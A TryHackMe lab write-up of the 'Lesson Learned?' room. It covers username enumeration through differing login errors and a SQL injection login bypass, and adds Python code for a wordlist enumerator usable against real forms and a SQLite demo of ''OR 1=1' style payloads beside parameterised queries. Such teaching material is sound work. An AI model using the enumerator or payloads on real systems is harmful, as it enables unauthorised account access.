Krishnaa Saravanan

Lesson Learned? Writeup || TryHackMe

Yo.

This is my first writeup, and if any mistakes are present, kindly ignore them T_T

This room is called 'Lesson Learned?', and after I cleared it, I had indeed learned a valuable lesson.

Start the machine and wait for around 5-6 seconds to boot up.

IT'S ENUMERATING TIME.

Start an nmap scan to find out which ports are open on the target, which services are listening on them, and other useful details about the victim.


You'll notice there are two open ports: one is SSH and the other is HTTP.

Hmmmm. The HTTP one seems interesting, since where are websites served from? Port 80!

Paste IP_ADDRESS:80 into the browser. You'll be presented with a rather boring page, actually :[


Whenever a login page is put in front of a script kiddie, what do they do? Launch SQLi like a mad person! Yes, I tried to do the same, but nah, no use.

I was about to go a level further to exploit the vulnerability, but had second thoughts and gave it some deeper thought instead.

After browsing for around half an hour, this OWASP page on 'Username and password enumeration' caught my eye. It said:

The scope of this test is to verify if it is possible to collect a set of valid usernames by interacting with the authentication mechanism of the application. This test will be useful for brute force testing, in which the tester verifies if, given a valid username, it is possible to find the corresponding password.
Often, web applications reveal when a username exists on system, either as a consequence of mis-configuration or as a design decision. For example, sometimes, when we submit wrong credentials, we receive a message that states that either the username is present on the system or the provided password is wrong.

Well, that's enough information.


Indeed, a failed login gives "invalid username and password."

Let's try bruteforcing.

To do this, send the login request to Burp Intruder and mark the username parameter as the payload position.


After specifying the payloads, start a sniper attack. I used the wordlist from here.
Also, refer to Burp Suite's documentation on how to launch a brute-force attack using Intruder, since I want you to do some of the heavy lifting lol.

While the attack was running, one of the responses had a different content length from all the others. The username was 'arnold'. When I used this username on the login page with an invalid password, it threw a different error message from the one shown for bogus usernames, and I knew I was halfway to the flag.
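The enumeration step above (different error text, and therefore a different content length, for a real username with a wrong password) is easy to reproduce and to check for in code. The following is an added example written for this writeup, not code from the room or from the original post. The user table, the wordlist and the response messages are constructed; `vulnerable_login` models the leaky form the post describes, `hardened_login` the same form with one generic failure message, and `enumerate_usernames` does what Burp Intruder's sniper attack does when you sort by the Length column. `http_probe` is included so the same loop can be pointed at a real form; its `username`/`password` field names are assumptions and must be taken from the captured request.

```python
"""Username enumeration by response differencing.

Added example for this writeup, not code from the room or the original post.
It models what the post describes: a login form that answers differently for
a real user with a wrong password than for a name that does not exist, so a
wordlist attack (Burp Intruder's sniper, or the loop below) can tell them apart
by response length. The user table, wordlist and messages are constructed.
"""
import secrets
import string
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, str]                  # (HTTP status, response body)
Probe = Callable[[str, str], Response]      # probe(username, password) -> Response

# Constructed user table for the mock application (hypothetical).
USERS = {"arnold": "correct horse battery staple"}

# Constructed wordlist; a real run would load a names list from a wordlist collection.
WORDLIST = ["admin", "user", "root", "arnold", "guest"]


def vulnerable_login(username: str, password: str) -> Response:
    """Leaky login: the failure message says whether the username exists."""
    if username not in USERS:
        return 200, "<p>Invalid username and password.</p>"
    if USERS[username] != password:
        return 200, f"<p>Invalid password for {username}.</p>"
    return 302, f"<p>Welcome back, {username}!</p>"


def hardened_login(username: str, password: str) -> Response:
    """Same logic, one generic failure message and status for every failure.

    It still echoes the submitted name, so a naive content-length comparison
    would vary with the length of each candidate; the enumerator below
    compensates for that by using a baseline of the same length.
    """
    if USERS.get(username) == password:
        return 302, f"<p>Welcome back, {username}!</p>"
    return 200, f"<p>Invalid username or password for {username}.</p>"


def _random_name(length: int) -> str:
    """A name that is almost surely not a real account (collision odds ~26^-length)."""
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(length))


def enumerate_usernames(probe: Probe, wordlist: List[str],
                        password: str = "definitely-not-the-password") -> List[Tuple[str, int, int]]:
    """Return (username, status, content_length) for every candidate whose
    response differs from the baseline for a non-existent name of the SAME
    length. Equal lengths mean a reflected username cannot by itself cause a
    false positive; a different status or length is the signal Burp Intruder
    shows in its Length column.
    """
    baselines: Dict[int, Tuple[int, int]] = {}
    found = []
    for name in wordlist:
        n = len(name)
        if n not in baselines:
            status, body = probe(_random_name(n), password)
            baselines[n] = (status, len(body))
        status, body = probe(name, password)
        if (status, len(body)) != baselines[n]:
            found.append((name, status, len(body)))
    return found


def http_probe(url: str, user_field: str = "username", pass_field: str = "password") -> Probe:
    """Build a real probe for a form-encoded login endpoint (field names are
    assumptions; copy them from the captured request). Redirects are not
    followed, so a 302 on success stays visible as a different status."""
    class _NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None

    opener = urllib.request.build_opener(_NoRedirect)

    def probe(username: str, password: str) -> Response:
        data = urllib.parse.urlencode({user_field: username, pass_field: password}).encode()
        try:
            with opener.open(urllib.request.Request(url, data=data), timeout=10) as resp:
                return resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:
            return err.code, err.read().decode(errors="replace")

    return probe


if __name__ == "__main__":
    print("leaky form:    ", enumerate_usernames(vulnerable_login, WORDLIST))
    print("hardened form: ", enumerate_usernames(hardened_login, WORDLIST))
```

Against the leaky form only `arnold` stands out (its response is shorter than the baseline for a six-letter bogus name); against the hardened form nothing does, even though the page echoes the name, because each candidate is compared with a non-existent name of the same length. Remember that a timing difference (for example, a password hash only being computed for real accounts) can leak the same information even when the bodies match, so length is not the only signal to look at.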


Then I thought of bypassing the login with a simple SQL injection. And yes, it worked! It gave me the flag along with a lengthy congratulations message.
Puzzled, I read it and understood that I had done the SQLi the right way. I'm not going to say what the message was, because I want you all to find it out yourselves; it's an important lesson for us script kiddies. XD
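To see what the bypass actually does to the query, here is an added example of my own (not the room's code, and it does not reproduce the room's message) using an in-memory SQLite database. The table, the rows and the passwords are constructed; `arnold` is the username found in the enumeration step. It shows a payload that targets that known username next to the blanket `' OR 1=1` tautology, what each one matches, and how a parameterised query stops both.

```python
"""SQL injection login bypass: string-built query versus parameterised query.

Added example, not the room's code and not the message the room shows; the
schema, rows and passwords are constructed. 'arnold' is the username the
enumeration step found. Two payloads are shown: one that targets that known
username and one tautology that matches every row in the table.
"""
import sqlite3
from typing import List, Optional

# Constructed table; a real application would store password hashes, not plaintext.
ROWS = [
    ("admin", "s3cr3t-admin"),
    ("arnold", "correct horse battery staple"),
    ("mary", "hunter2"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", ROWS)
    return conn


def vulnerable_query(username: str, password: str) -> str:
    """The query many tutorial apps build: user input pasted straight into SQL."""
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Logs in as the FIRST row the (possibly injected) query matches."""
    row = conn.execute(vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def matched_rows(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Every row the injected query matches: the blast radius of a tautology."""
    return [r[0] for r in conn.execute(vulnerable_query(username, password)).fetchall()]


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Parameterised: the quote and the comment marker are just characters in a value."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


TARGETED = "arnold'-- "     # closes the string, then comments out the password check
TAUTOLOGY = "' OR 1=1-- "   # WHERE username = '' OR 1=1 ... is true for every row

if __name__ == "__main__":
    conn = make_db()
    print(vulnerable_query(TARGETED, "x"))
    print("targeted  ->", vulnerable_login(conn, TARGETED, "x"))
    print("tautology ->", vulnerable_login(conn, TAUTOLOGY, "x"),
          "first of", matched_rows(conn, TAUTOLOGY, "x"))
    print("safe      ->", safe_login(conn, TARGETED, "x"), safe_login(conn, TAUTOLOGY, "x"))
```

The targeted payload turns the query into `... WHERE username = 'arnold'-- ' AND password = 'x'`, so it matches exactly one row and logs in as arnold. The tautology matches all three rows and logs in as whichever one the database returns first (here, admin), which is why it tells you nothing about who you are about to become, and why the same `OR 1=1` pasted into an UPDATE or DELETE would touch every row. The parameterised query returns nothing for either payload, because the input is bound as a value rather than spliced into the statement.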


And yes, I will be back with more writeups/walkthroughs!
